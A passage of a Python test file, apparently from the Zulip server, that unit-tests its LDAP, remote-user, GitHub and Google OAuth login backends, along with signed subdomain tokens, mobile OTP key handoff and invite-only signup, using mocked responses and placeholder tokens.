self.setup_subdomain(user_profile)
username = self.get_username()
backend = ZulipLDAPAuthBackend()
# Test LDAP auth fails when LDAP server rejects password
with mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn',
side_effect=_LDAPUser.AuthenticationFailed("Failed")), (
mock.patch('django_auth_ldap.backend._LDAPUser._check_requirements')), (
mock.patch('django_auth_ldap.backend._LDAPUser._get_user_attrs',
return_value=dict(full_name=['Hamlet']))):
self.assertIsNone(backend.authenticate(email, password))
with mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn'), (
mock.patch('django_auth_ldap.backend._LDAPUser._check_requirements')), (
mock.patch('django_auth_ldap.backend._LDAPUser._get_user_attrs',
return_value=dict(full_name=['Hamlet']))):
self.verify_backend(backend,
bad_kwargs=dict(username=username,
password=password,
realm_subdomain='acme'),
good_kwargs=dict(username=username,
password=password,
realm_subdomain='zulip'))
def test_devauth_backend(self):
# type: () -> None
self.verify_backend(DevAuthBackend(),
good_kwargs=dict(username=self.get_username()))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',))
def test_remote_user_backend(self):
# type: () -> None
username = self.get_username()
self.verify_backend(ZulipRemoteUserBackend(),
good_kwargs=dict(remote_user=username,
realm_subdomain='zulip'),
bad_kwargs=dict(remote_user=username,
realm_subdomain='acme'))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',))
@override_settings(SSO_APPEND_DOMAIN='zulip.com')
def test_remote_user_backend_sso_append_domain(self):
# type: () -> None
username = self.get_username(email_to_username)
self.verify_backend(ZulipRemoteUserBackend(),
good_kwargs=dict(remote_user=username,
realm_subdomain='zulip'),
bad_kwargs=dict(remote_user=username,
realm_subdomain='acme'))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',))
def test_github_backend(self):
# type: () -> None
user = self.example_user('hamlet')
email = user.email
good_kwargs = dict(response=dict(email=email), return_data=dict(),
realm_subdomain='zulip')
bad_kwargs = dict(response=dict(email=email), return_data=dict(),
realm_subdomain='acme')
self.verify_backend(GitHubAuthBackend(),
good_kwargs=good_kwargs,
bad_kwargs=bad_kwargs)
class SocialAuthMixinTest(ZulipTestCase):
def test_social_auth_mixing(self):
# type: () -> None
mixin = SocialAuthMixin()
with self.assertRaises(NotImplementedError):
mixin.get_email_address()
with self.assertRaises(NotImplementedError):
mixin.get_full_name()
class GitHubAuthBackendTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
self.name = 'Hamlet'
self.backend = GitHubAuthBackend()
self.backend.strategy = DjangoStrategy(storage=BaseDjangoStorage())
self.user_profile.backend = self.backend
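        # Give the strategy a fake GET /complete request (with an empty session
        # and a zulip.testserver host) so do_auth() can run without a real HTTP
        # round trip.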
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.get_host = lambda: 'zulip.testserver'
request.user = self.user_profile
self.backend.strategy.request = request
def do_auth(self, *args, **kwargs):
# type: (*Any, **Any) -> UserProfile
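        # Stand-in for the real GithubOAuth2.do_auth: simply run Django's
        # authenticate() with the GitHub backend enabled.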
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',)):
return authenticate(**kwargs)
def test_github_auth_enabled(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',)):
self.assertTrue(github_auth_enabled())
def test_full_name_with_missing_key(self):
# type: () -> None
self.assertEqual(self.backend.get_full_name(), '')
self.assertEqual(self.backend.get_full_name(response={'name': None}), '')
def test_full_name_with_none(self):
# type: () -> None
self.assertEqual(self.backend.get_full_name(response={'email': None}), '')
def test_github_backend_do_auth_with_non_existing_subdomain(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth):
self.backend.strategy.session_set('subdomain', 'test')
response = dict(email=self.email, name=self.name)
result = self.backend.do_auth(response=response)
assert(result is not None)
self.assertIn('subdomain=1', result.url)
def test_github_backend_do_auth_with_subdomains(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth):
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
result = self.backend.do_auth(response=response)
assert(result is not None)
self.assertTrue(result.url.startswith('http://zulip.testserver/accounts/login/subdomain/'))
def test_github_backend_do_auth_for_default(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
response = dict(email=self.email, name=self.name)
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_default_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
response = dict(email=self.email, name=self.name)
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_team(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubTeamOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_TEAM_ID='zulip-webapp'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_team_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubTeamOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_TEAM_ID='zulip-webapp'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_org(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOrganizationOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_ORG_NAME='Zulip'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_org_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOrganizationOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_ORG_NAME='Zulip'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_authenticate_nonexisting_user(self):
# type: () -> None
with mock.patch('zproject.backends.get_user_profile_by_email',
side_effect=UserProfile.DoesNotExist("Do not exist")):
response = dict(email=self.email, name=self.name)
return_data = dict() # type: Dict[str, Any]
user = self.backend.authenticate(return_data=return_data, response=response)
self.assertIs(user, None)
self.assertTrue(return_data['valid_attestation'])
def test_github_backend_authenticate_invalid_email(self):
# type: () -> None
response = dict(email=None, name=self.name)
return_data = dict() # type: Dict[str, Any]
user = self.backend.authenticate(return_data=return_data, response=response)
self.assertIs(user, None)
self.assertTrue(return_data['invalid_email'])
def test_github_backend_inactive_user(self):
# type: () -> None
def do_auth_inactive(*args, **kwargs):
# type: (*Any, **Any) -> UserProfile
return_data = kwargs['return_data']
return_data['inactive_user'] = True
return self.user_profile
with mock.patch('zerver.views.auth.login_or_register_remote_user') as result, \
mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth_inactive):
response = dict(email=self.email, name=self.name)
user = self.backend.do_auth(response=response)
result.assert_not_called()
self.assertIs(user, None)
def test_github_backend_new_user_wrong_domain(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = '[email protected]'
response = dict(email=email, name='Ghost')
result = self.backend.do_auth(response=response)
self.assert_in_response('action="/register/"', result)
self.assert_in_response('Your email address, {}, is not '
'in one of the domains that are allowed to register '
'for accounts in this organization.'.format(email), result)
def test_github_backend_new_user(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = self.nonreg_email('newuser')
name = "Ghost"
response = dict(email=email, name=name)
result = self.backend.do_auth(response=response)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": name,
"key": confirmation_key}
result = self.client_post('/accounts/register/', data)
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
result = self.client_post(
'/accounts/register/',
{'full_name': name,
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newuser')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_github_backend_existing_user(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = self.example_email("hamlet")
response = dict(email=email, name='Hamlet')
result = self.backend.do_auth(response=response)
self.assert_in_response('action="/register/"', result)
self.assert_in_response('[email protected] already has an account',
result)
def test_github_backend_new_user_when_is_signup_is_false(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '0'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = '[email protected]'
response = dict(email=email, name='Ghost')
result = self.backend.do_auth(response=response)
self.assert_in_response(
'action="/register/"', result)
self.assert_in_response('No account found for',
result)
self.assert_in_response('[email protected]. Would you like to register instead?',
result)
def test_login_url(self):
# type: () -> None
result = self.client_get('/accounts/login/social/github')
self.assertIn(reverse('social:begin', args=['github']), result.url)
self.assertIn('is_signup=0', result.url)
def test_signup_url(self):
# type: () -> None
result = self.client_get('/accounts/register/social/github')
self.assertIn(reverse('social:begin', args=['github']), result.url)
self.assertIn('is_signup=1', result.url)
def test_github_complete(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('social_core.backends.oauth.BaseOAuth2.process_error',
side_effect=AuthFailed('Not found')):
result = self.client_get(reverse('social:complete', args=['github']))
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
def test_github_complete_when_base_exc_is_raised(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('social_core.backends.oauth.BaseOAuth2.auth_complete',
side_effect=AuthStateForbidden('State forbidden')), \
mock.patch('zproject.backends.logging.warning'):
result = self.client_get(reverse('social:complete', args=['github']))
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
def test_github_complete_when_email_is_invalid(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('zproject.backends.GitHubAuthBackend.get_email_address',
return_value=None) as mock_get_email_address, \
mock.patch('social_core.backends.oauth.OAuthAuth.validate_state',
return_value='state'), \
mock.patch('social_core.backends.oauth.BaseOAuth2.request_access_token',
return_value={'access_token': 'token'}), \
mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.logging.warning'):
result = self.client_get(reverse('social:complete', args=['github']),
info={'state': 'state'})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please click the following button "
"if you wish to register.", result)
self.assertEqual(mock_get_email_address.call_count, 2)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
class ResponseMock(object):
def __init__(self, status_code, data):
# type: (int, Any) -> None
self.status_code = status_code
self.data = data
def json(self):
        # type: () -> Any
return self.data
@property
def text(self):
# type: () -> str
return "Response text"
class GoogleOAuthTest(ZulipTestCase):
def google_oauth2_test(self, token_response, account_response, *, subdomain=None,
mobile_flow_otp=None, is_signup=None):
# type: (ResponseMock, ResponseMock, Optional[str], Optional[str], Optional[str]) -> HttpResponse
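        # Walk the full Google login flow: /accounts/login/google/, the
        # /send/ redirect, and finally /done/ with the CSRF state taken from
        # the redirect URL, stubbing out the token and account-info HTTP
        # calls (requests.post / requests.get) with the supplied mocks.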
url = "/accounts/login/google/"
params = {}
headers = {}
if subdomain is not None:
headers['HTTP_HOST'] = subdomain + ".testserver"
if mobile_flow_otp is not None:
params['mobile_flow_otp'] = mobile_flow_otp
headers['HTTP_USER_AGENT'] = "ZulipAndroid"
if is_signup is not None:
params['is_signup'] = is_signup
if len(params) > 0:
url += "?%s" % (urllib.parse.urlencode(params))
result = self.client_get(url, **headers)
if result.status_code != 302 or '/accounts/login/google/send/' not in result.url:
return result
# Now do the /google/send/ request
result = self.client_get(result.url, **headers)
self.assertEqual(result.status_code, 302)
if 'google' not in result.url:
return result
self.client.cookies = result.cookies
# Now extract the CSRF token from the redirect URL
parsed_url = urllib.parse.urlparse(result.url)
csrf_state = urllib.parse.parse_qs(parsed_url.query)['state']
with mock.patch("requests.post", return_value=token_response), (
mock.patch("requests.get", return_value=account_response)):
result = self.client_get("/accounts/login/google/done/",
dict(state=csrf_state), **headers)
return result
class GoogleSubdomainLoginTest(GoogleOAuthTest):
def test_google_oauth2_start(self):
# type: () -> None
result = self.client_get('/accounts/login/google/', subdomain="zulip")
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
subdomain = urllib.parse.parse_qs(parsed_url.query)['subdomain']
self.assertEqual(subdomain, ['zulip'])
def test_google_oauth2_success(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip')
data = load_subdomain_token(result)
self.assertEqual(data['email'], self.example_email("hamlet"))
self.assertEqual(data['name'], 'Full Name')
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
def test_google_oauth2_no_fullname(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(givenName="Test", familyName="User"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip')
data = load_subdomain_token(result)
self.assertEqual(data['email'], self.example_email("hamlet"))
self.assertEqual(data['name'], 'Test User')
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
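    # In the mobile flow, the API key is handed back to the app in a zulip://
    # redirect, encrypted with the mobile_flow_otp value supplied by the client.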
def test_google_oauth2_mobile_success(self):
# type: () -> None
mobile_flow_otp = '1234abcd' * 8
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
self.assertEqual(len(mail.outbox), 0)
with self.settings(SEND_LOGIN_EMAILS=True):
# Verify that the right thing happens with an invalid-format OTP
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp="1234")
self.assert_json_error(result, "Invalid OTP")
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp="invalido" * 8)
self.assert_json_error(result, "Invalid OTP")
# Now do it correctly
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp=mobile_flow_otp)
self.assertEqual(result.status_code, 302)
redirect_url = result['Location']
parsed_url = urllib.parse.urlparse(redirect_url)
query_params = urllib.parse.parse_qs(parsed_url.query)
self.assertEqual(parsed_url.scheme, 'zulip')
self.assertEqual(query_params["realm"], ['http://zulip.testserver'])
self.assertEqual(query_params["email"], [self.example_email("hamlet")])
encrypted_api_key = query_params["otp_encrypted_api_key"][0]
self.assertEqual(self.example_user('hamlet').api_key,
otp_decrypt_api_key(encrypted_api_key, mobile_flow_otp))
self.assertEqual(len(mail.outbox), 1)
self.assertIn('Zulip on Android', mail.outbox[0].body)
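    # Helper: sign `data` with the subdomain token salt and request the
    # log_into_subdomain endpoint, mirroring where the OAuth flows above land.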
def get_log_into_subdomain(self, data, *, key=None, subdomain='zulip'):
# type: (Dict[str, Any], Optional[str], str) -> HttpResponse
token = signing.dumps(data, salt=_subdomain_token_salt, key=key)
url_path = reverse('zerver.views.auth.log_into_subdomain', args=[token])
return self.client_get(url_path, subdomain=subdomain)
def test_log_into_subdomain(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
# If authenticate_remote_user detects a subdomain mismatch, then
# the result should redirect to the login page.
with mock.patch(
'zerver.views.auth.authenticate_remote_user',
return_value=(None, {'invalid_subdomain': True})):
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
            self.assertTrue(result['Location'].endswith('?subdomain=1'))
def test_log_into_subdomain_when_signature_is_bad(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('logging.warning') as mock_warning:
result = self.get_log_into_subdomain(data, key='nonsense')
mock_warning.assert_called_with("Subdomain cookie: Bad signature.")
self.assertEqual(result.status_code, 400)
def test_log_into_subdomain_when_signature_is_expired(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('django.core.signing.time.time', return_value=time.time() - 45):
token = signing.dumps(data, salt=_subdomain_token_salt)
url_path = reverse('zerver.views.auth.log_into_subdomain', args=[token])
with mock.patch('logging.warning') as mock_warning:
result = self.client_get(url_path, subdomain='zulip')
mock_warning.assert_called_once()
self.assertEqual(result.status_code, 400)
def test_log_into_subdomain_when_is_signup_is_true(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': True}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
        self.assert_in_response('hamlet@zulip.com already has an account', result)
def test_log_into_subdomain_when_is_signup_is_true_and_new_user(self):
# type: () -> None
data = {'name': 'New User Name',
'email': '[email protected]',
'subdomain': 'zulip',
'is_signup': True}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": data['name'],
"key": confirmation_key}
result = self.client_post('/accounts/register/', data, subdomain="zulip")
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
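    # When a realm requires invitations, signing up through this flow should
    # only work via a multiuse invite link; the test below covers both cases.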
def test_log_into_subdomain_when_using_invite_link(self):
# type: () -> None
data = {'name': 'New User Name',
'email': '[email protected]',
'subdomain': 'zulip',
'is_signup': True}
realm = get_realm("zulip")
realm.invite_required = True
realm.save()
stream_names = ["new_stream_1", "new_stream_2"]
streams = []
for stream_name in set(stream_names):
stream, _ = create_stream_if_needed(realm, stream_name)
streams.append(stream)
# Without the invite link, we can't create an account due to invite_required
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
self.assert_in_success_response(['Sign up for Zulip'], result)
# Now confirm an invitation link works
referrer = self.example_user("hamlet")
multiuse_obj = MultiuseInvite.objects.create(realm=realm, referred_by=referrer)
multiuse_obj.streams = streams
multiuse_obj.save()
invite_link = create_confirmation_link(multiuse_obj, realm.host,
Confirmation.MULTIUSE_INVITE)
result = self.client_get(invite_link, subdomain="zulip")
self.assert_in_success_response(['Sign up for Zulip'], result)
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().last()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data2 = {"from_confirmation": "1",
"full_name": data['name'],
"key": confirmation_key}
result = self.client_post('/accounts/register/', data2, subdomain="zulip")
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
# Click confirm registration button.
result = self.client_post(
'/accounts/register/',
{'full_name': 'New User Name',
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
self.assertEqual(sorted(self.get_streams('[email protected]', realm)), stream_names)
def test_log_into_subdomain_when_email_is_none(self):
# type: () -> None
data = {'name': None,
'email': None,
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('logging.warning'):
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please click the following button if you "
"wish to register", result)
def test_user_cannot_log_into_nonexisting_realm(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response,
subdomain='nonexistent')
self.assert_in_success_response(["There is no Zulip organization hosted at this subdomain."],
result)
def test_user_cannot_log_into_wrong_subdomain(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response,
subdomain='zephyr')
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://zephyr.testserver/accounts/login/subdomain/"))
result = self.client_get(result.url.replace('http://zephyr.testserver', ''),
subdomain="zephyr")
self.assertEqual(result.status_code, 302)
result = self.client_get('/accounts/login/?subdomain=1', subdomain="zephyr")
self.assert_in_success_response(["Your Zulip account is not a member of the organization associated with this subdomain."],
result)
def test_user_cannot_log_into_wrong_subdomain_with_cookie(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zephyr'}
with mock.patch('logging.warning') as mock_warning:
result = self.get_log_into_subdomain(data)
mock_warning.assert_called_with("Login attempt on invalid subdomain")
self.assertEqual(result.status_code, 400)
def test_google_oauth2_registration(self):
# type: () -> None
"""If the user doesn't exist yet, Google auth can be used to register an account"""
email = "[email protected]"
realm = get_realm("zulip")
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=email)])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
is_signup='1')
data = load_subdomain_token(result)
name = 'Full Name'
self.assertEqual(data['email'], email)
self.assertEqual(data['name'], name)
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
result = self.client_get(result.url)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": name,
"key": confirmation_key}
result = self.client_post('/accounts/register/', data)
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
# Click confirm registration button.
result = self.client_post(
'/accounts/register/',
{'full_name': name,
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
user_profile = get_user(email, realm)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
class GoogleLoginTest(GoogleOAuthTest):
@override_settings(ROOT_DOMAIN_LANDING_PAGE=True)
def test_google_oauth2_subdomains_homepage(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain="")
self.assertEqual(result.status_code, 302)
self.assertIn('subdomain=1', result.url)
def test_google_oauth2_400_token_response(self):
# type: () -> None
token_response = ResponseMock(400, {})
with mock.patch("logging.warning") as m:
result = self.google_oauth2_test(token_response, ResponseMock(500, {}))
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"User error converting Google oauth2 login to token: Response text")
def test_google_oauth2_500_token_response(self):
# type: () -> None
token_response = ResponseMock(500, {})
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, ResponseMock(500, {}))
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Could not convert google oauth2 code to access_token: Response text")
def test_google_oauth2_400_account_response(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_response = ResponseMock(400, {})
with mock.patch("logging.warning") as m:
result = self.google_oauth2_test(token_response, account_response)
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Google login failed making info API call: Response text")
def test_google_oauth2_500_account_response(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_response = ResponseMock(500, {})
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, account_response)
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Google login failed making API call: Response text")
def test_google_oauth2_account_response_no_email(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[])
account_response = ResponseMock(200, account_data)
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, account_response,
subdomain="zulip")
self.assertEqual(result.status_code, 400)
self.assertIn("Google oauth2 account email not found:", m.call_args_list[0][0][0])
def test_google_oauth2_error_access_denied(self):
# type: () -> None
result = self.client_get("/accounts/login/google/done/?error=access_denied")
self.assertEqual(result.status_code, 302)
path = urllib.parse.urlparse(result.url).path
self.assertEqual(path, "/")
def test_google_oauth2_error_other(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?error=some_other_error")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Error from google oauth2 login: some_other_error")
